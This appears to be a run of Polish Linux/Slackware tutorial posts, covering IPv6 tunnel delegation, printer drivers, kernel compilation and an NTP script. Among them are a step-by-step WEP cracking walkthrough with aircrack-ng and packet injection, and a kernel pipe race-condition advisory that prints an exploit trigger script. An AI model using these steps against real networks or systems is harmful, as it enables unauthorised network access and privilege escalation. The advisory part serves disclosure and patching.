• Pula /48 IPv6
• Wkompilowana obsługa IPv6 w kernel na serwerze i kliencie
• Serwer nazw (named) na obu maszynach.
• hasło roota również na obu maszynach ;)

Dane:

• 2001:6a0:128::/48 – subnet z którego będziemy delegować pulę /64
• 2001:6a0:128:00fe::/64 – pula którą oddelegowujemy
• 78.88.111.11 – Adres IP serwera udostępniającego pulę
• 78.88.222.22 – Adres IP maszyny na którą udostępniamy.

Tworzymy dwa skrypty, jeden dla serwera drugi dla klienta.

SERWER:

#!/bin/bash
echo 1 > /proc/sys/net/ipv6/conf/all/forwarding
ip tunnel add tunel-delegate mode sit local 78.88.111.11 remote 78.88.222.22 ttl 64
ip link set tunel-delegate up
### początek i koniec tunelu ###
ip addr add 2001:6a0:128:00aa::1/126 dev tunel-delegate
### wielkość podsieci ###
ip route add 2001:6a0:128:00fe::/64 dev tunel-delegate

KLIENT:

#!/bin/bash
ip tunnel add laptop-v6 mode sit remote 78.88.111.11 local 78.88.222.22 ttl 64
ip link set laptop-v6 up
### dodajemy adresy z nowej puli ###
ip addr add 2001:6a0:128:00fe::1 dev laptop-v6
ip addr add 2001:6a0:128:00fe::2 dev laptop-v6
ip addr add 2001:6a0:128:00fe::3 dev laptop-v6
### ###
ip route add 2000::/3 dev laptop-v6

RevDNS:

Żeby klient mógł sam zarządzać swoimi revami wykonujemy:

SERWER:

edycja /etc/named.conf, dopisujemy:

zone „e.f.0.0.8.2.1.0.0.a.6.0.1.0.0.2.ip6.arpa” {
type slave;
file „e.f.0.0.8.2.1.0.0.a.6.0.1.0.0.2.ip6.arpa”;
masters { 78.88.222.22; };
};

Plik strefy transferuje się od klienta gdy ten odpali swojego nameda.

KLIENT:

edycja /etc/named.conf, dopisujemy:

zone „e.f.0.0.8.2.1.0.0.a.6.0.1.0.0.2.ip6.arpa” {
type master;
allow-transfer { 78.88.111.11; };
file „e.f.0.0.8.2.1.0.0.a.6.0.1.0.0.2.ip6.arpa”;
notify yes;
};

Tworzymy plik strefy
touch /var/named/e.f.0.0.8.2.1.0.0.a.6.0.1.0.0.2.ip6.arpa

i wpisujemy w nim:

; e.f.0.0.8.2.1.0.0.a.6.0.1.0.0.2.ip6.arpa.
;

$TTL 64

@ IN SOA twoj.dns.pl admin.domena.pl. (
2010072505 ; serial

21600 ; refresh
7200 ; retry
1209600 ; expire
100 ) ; default_ttl
;

@ IN NS twoj.dns.pl.

1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 IN PTR jakasdomena.pl.

(ilość cyfr w tym wpisie „1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0” zależy od ilości cyfr i liter w obliczonym RevDNS dla naszej puli, czyli od wyniku „e.f.0.0.8.2.1.0.0.a.6.0.1.0.0.2.ip6.arpa” wywalamy .ip6.arpa, zostaje nam 16 znaków więc robimy działanie 32 – 16 = 16)

Odpalamy skrypty i przeładowujemy nameda na obu maszynach i na tym koniec.

(pulę /48 można sobie przyorganizować z SixXS.net lub HE.net)

Autor: Krzysztof Wnuk

wget http://files.canon-europe.com/files/soft22415/software/22415.tgz
tar -xvf 22415.tgz
tar -xvf iP1500Linux.tar.gz
cd iP1500/
rpm2tgz *.tgz
su
installpkg *.tgz

Następnie trzeba porobić dowiązania bibliotek w tym celu trzeba zalogować się na konto root i wykonać po kolei:

cd /usr/lib
ln -s libpng12.so.0 libpng.so.2
ln -s libtiff.so.4 libtiff.so.3
ln -s libxml2.so.2 libxml.so.1

Teraz przeładowanie cups poleceniem /etc/rc.d/rc.cups restart

Ostatnim krokiem jaki pozostaje to dodanie drukarki poprzez manager KDE

kMenu -> Centrum sterowania -> urządzenia peryferyjne -> drukarki -> dodaj drukarkę

Najnowsze wydanie przynosi wiele aktualizacji, między innymi:

– kernel 2.6.33.4
– KDE 4.4.3
– Xfce 4.6.1
– gcc-4.4.4
– Wsparcie szyfrowanych połączeń sieciowych z OpenSSL, OpenSSH, OpenVPN oraz GnuPG.
– Serwer Apache 2.2.15
– PHP 5.2.13
– Wsparcie dla PCMCIA, CardBus, USB, IEE1394 (FireWire) i ACPI
– Perl 5.10.1
– Python 2.6.4

Pełną listę nowych pakietów można zobaczyć pod adresem:

ftp://ftp.slackware.com/pub/slackware/slackware-13.1/PACKAGES.TXT

Slackware dostępny w wersji dla procesorów 32 i 64 bitowych
można pobrać z jednego z wielu serwerów ftp i http pod adresem:

http://slackware.com/getslack/

wget http://klodzko.linux.pl/irckill.tar.gz
tar -xzvf irckill.tar.gz
cd irckill/
make
make install

Następnie otwieramy do edycji plik /etc/irckill.conf i wpisujemy do niego:

# Plik do którego logowane są autokille.
log: /var/log/irckill.log

# Czas sprawdzania połączeń (w sekundach).
interval: 15

# Zakres portow do skanowania.
port: 6660-7779

# Akcja.
# 0 – będą killowane tylko procesy „wykraczające” po za limit.
# 1 – będą killowane wszystkie procesy IRC usera.
killall: 1

# Limity mogą być ustawiane w zakresie 0-99 połączeń
# lub „-” oznacza brak limitu.

# UserID          Limit IPv4          Limit IPv6

root                    0                            0
user1                  1                             –
user2                  0                            1

Teraz tylko należy uruchomić irckill poleceniem /usr/local/sbin/irckill (w zależności od systemu ścieżka może być inna np. /usr/sbin/irckill)
i dopisać do /etc/rc.d/rc.local aby uruchamiał się przy starcie serwera.

(Aplikacja użyta w artykule to irckill autorstwa Tomasza Krynickiego, Michala Gizowskiego i Bartosza Kaliszuka na licencji GNU GPL)

Część 1 – SKANER

Pobieramy potrzebne sterowniki w paczkach .rpm (niestety nie ma paczek dla slackware) stąd
pakiety brscan3-0.2.8-1.i386.rpm i brscan-skey-0.2.1-3.i386.rpm

po pobraniu przerabiamy na .tgz

rpm2tgz brscan3-0.2.8-1.i386.rpm
rpm2tgz brscan-skey-0.2.1-3.i386.rpm

i instalujemy

su
installpkg brscan3-0.2.8-1.i386.tgz
installpkg brscan-skey-0.2.1-3.i386.tgz

Teraz otwieramy w naszym ulubionym edytorze plik /etc/sane.d/dll.conf
i dodjemy nowe urządzenie

brother3

zapisujemy i wychodzimy z edytora.

Teraz otwieramy do edycji plik /lib/udev/rules.d/80-libsane.rules

i dodajemy do niego wpis:

# Brother dcp-585cw
SYSFS{idVendor}==”04f9″, MODE=”0666″, GROUP=”scanner”, ENV{libsane_matched}=”yes”

uruchamiamy program xsane który automatycznie wykryje urządzenie.

Część 2 – DRUKARKA

Pobieramy potrzebne sterowniki w paczkach .rpm (niestety nie ma paczek dla slackware) stąd
pakiety dcp585cwlpr-1.1.2-2.i386.rpm i dcp585cwcupswrapper-1.1.2-2.i386.rpm

po pobraniu przerabiamy na .tgz

rpm2tgz dcp585cwlpr-1.1.2-2.i386.rpm
rpm2tgz dcp585cwcupswrapper-1.1.2-2.i386.rpm

i instalujemy

su
installpkg dcp585cwlpr-1.1.2-2.i386.tgz
installpkg dcp585cwcupswrapper-1.1.2-2.i386.tgz

Teraz kopiujemy plik cupswrapperdcp585cw z katalogu /usr/local/Brother/Printer/dcp585cw/cupswrapper/ do /etc/rc.d/

cp /usr/local/Brother/Printer/dcp585cw/cupswrapper/cupswrapperdcp585cw /etc/rc.d/

Następnie w ulubionym edytorze otwieramy do edycji plik /etc/rc.d/rc.M
odnajdujemy sekcję „CUPS”

# Start the print spooling system. This will usually be LPRng (lpd) or CUPS.
if [ -x /etc/rc.d/rc.cups ]; then
# Start CUPS:
/etc/rc.d/rc.cups start
elif [ -x /etc/rc.d/rc.lprng ]; then
# Start LPRng (lpd):
. /etc/rc.d/rc.lprng start
fi

i dopisujemy pod nią

if [ -x /etc/rc.d/cupswrapperdcp585cw ]; then
/etc/rc.d/cupswrapperdcp585cw
fi

Po ponownym uruchomieniu systemu urządzenie będzie widoczne i dodane.
(można też ręcznie to wykonać poleceniem /etc/rc.d/cupswrapperdcp585cw)

– komputer z kartą sieciową umożliwiającą monitorowanie (np. Intel PRO/Wireless 3945ABG)
– pakiet aircrack-ng
– program macchanger
– sieć zabezpieczona WEP

Na początek trzeba ustawić kartę wi-fi w tryb monitoringu i dla ułatwienia zmienić adres mac karty
(w przykładzie karta wi-fi posiada interfejs wlan0)

ifconfig wlan0 down
macchanger ––mac 00:11:22:33:44:55 wlan0
iwconfig wlan0 mode monitor
ifconfig wlan0 up

teraz otwieramy konsolę i z roota wydajemy polecenie:

airodump-ng wlan0

wyświetli nam się lista sieci, jeżeli znajdziemy sieć która nas interesuje zabijamy program ^C
(informacje potrzebne to: BSSID i kanał)

następnie należy wydać polecenie: (gdzie za XX wpisujemy kanał, a za XX:XX:XX:XX:XX:XX bssid sieci)

airodump-ng -c XX -w wifi ––bssid XX:XX:XX:XX:XX:XX wlan0

teraz otwieramy kolejne okno konsoli i również z roota wydajemy polecenie:

aireplay-ng -3 -b XX:XX:XX:XX:XX:XX -h 00:11:22:33:44:55 wlan0

teraz pakiety zapisują nam się do pliku wifi-01.cap i z niego będziemy wyciągać klucz WEP.

W tym celu w kolejnym oknie konsoli wydajemy polecenie:

aircrack-ng -b XX:XX:XX:XX:XX:XX wifi-01.cap

i czekamy na wyniki, na początku program zapewne powie ze jest za mało pakietów i że należy powtórzyć przy większej ilości, więc trzeba uzbroić się w cierpliwość.

Powyższy artykuł ma wyłącznie charakter edukacyjny.

Kiedy heise Security skontaktowało się z Bradem Spenglerem, ten oświadczył, że przypuszczalnie jeszcze dziś opublikuje exploit wykorzystujący opisywaną usterkę.
Problem

Zgodnie z wydanym przez programistów komunikatem usterka tkwi w komponencie odpowiedzialnym za obsługę łączy komunikacyjnych w pliku pipe.c i ujawnia się podczas korzystania z funkcji pipe_read_open(), pipe_write_open() i pipe_rdwr_open(). Błąd może wystąpić w przypadku przedwczesnego zainicjowania elementu mutex (mutual exclusion). Mamy tu zatem klasyczną sytuację wyścigu (race condition).
Obejście

Podobnie jak w przypadku wcześniejszych błędów polegających na dereferencji wskaźnika pustego w jądrze Linux, także najnowszą usterkę daje się wykorzystać tylko w sytuacji, gdy systemowa zmienna mmap_min_addr jest ustawiona na 0. Zmienna mmap_min_addr określa najniższy adres wirtualny, na który danemu procesowi wolno mapować. Jeśli jej wartość jest większa niż 0, wówczas nie zadziałają exploity bazujące na dereferencji pustego wskaźnika. Niestety, przestają wtedy działać również niektóre opensource’owe aplikacje, takie jak choćby Wine czy dosemu, więc wielu dystrybutorów (m.in. Red Hat i Debian) ustawia tę wartość domyślnie na 0.
Rozwiązanie

Lukę zamknięto na razie tylko w wydaniu Release Candidate 6 przyszłej edycji oznaczonej numerem 2.6.32.

Red Hat opublikował już uaktualnione pakiety, które eliminują usterkę. Z kolei Debian przygotował specjalny instruktaż ukazujący sposób zmiany wartości zmiennej. W Ubuntu zmienna mmap_min_addr jest ustawiona na 65535, co uniemożliwia działanie exploitów.

EXPLOIT:

while : ; do
{ echo y ; sleep 1 ; } | { while read ; do echo z$REPLY; done ; } &
PID=$!
OUT=$(ps -efl | grep 'sleep 1′ | grep -v grep |
{ read PID REST ; echo $PID; } )
OUT=”${OUT%% *}”
DELAY=$((RANDOM * 1000 / 32768))
usleep $((DELAY * 1000 + RANDOM % 1000 ))
echo n > /proc/$OUT/fd/1 # Trigger defect
done

Źródło: heise-online.pl i securityfocus.com

Komentarz admina:
Większość dystrybucji ma domyślnie ustawione  mmap_min_addr > 0 więc exploit i tak nie zadziała.

su
cd /usr/src

następnie usuwamy stare dowiązanie do źródeł kernela

rm linux

teraz pora na pobranie najnowszego kernela z kernel.org (na dzień dzisiejszy 2.6.31.5)

wget http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.31.5.tar.bz2

gdy wget zakończy pracę rozpakowujemy jajko

tar -xjvf linux-2.6.31.5.tar.bz2

i tworzymy nowe dowiązanie

ln -s linux-2.6.31.5 linux

teraz przechodzimy do katalogu z kernelem i wykonujemy następujące operacje:

cd /usr/src/linux

kopiowanie obecnego configa

zcat /proc/config.gz > /usr/src/linux/.config

kompilacja, instalacja modułów, budowanie kernela, instalacja nowego kernela

make
make modules_install
make bzImage
make install

Tworzenie i instalacja nowych nagłówków kernela (kernel headers)

make headers_check
make headers_install INSTALL_HDR_PATH=/usr/include

Teraz tylko reboot i jeżeli wszystko przebiegło pomyślnie to cieszymy się nowym kernelem.

(Po instalacji kernela dla komputerów z kartami graficznymi nvidia konieczna jest ponowna instalacja sterownika)

Otwieramy do edycji plik:

freerider@niewinny:~$ nano ~/.thunderbird/xxxxxx.default/prefs.js

następnie na końcu pliku dopisujemy:

user_pref(„network.cookie.prefsMigrated”, true);
user_pref(„network.protocol-handler.app.http”, „/usr/bin/firefox”);
user_pref(„network.protocol-handler.app.https”, „/usr/bin/firefox”);

Teraz tylko restart thunderbirda i odnośniki będą otwierać sie w mozilli firefox.

Autor: Krzysztof Wnuk

#!/bin/sh

SERVER=”193.138.118.2″
LOG=”/var/log/messages”
DOM=`date +%d`
DON=`date +%b`
NOW=`date +%X`

if
/usr/sbin/ntpdate -u $SERVER ; then
/sbin/hwclock –systohc
fi

echo „$DON $DOM $NOW – Czas zostal zaaktualizowany z serwera $SERVER” >> $LOG

zapisujemy i wychodzimy z edytora.
Teraz można skrypt ntp.sh odpalić ręcznie (z roota  ./ntp.sh) lub przenieść
do katalogu cron.(daily|weekly|monthly) aby byl wywoływany z crona raz na dzień, tydzień lub miesiąc.

gotowy skrypt można pobrać tutaj

Autor: Krzysztof Wnuk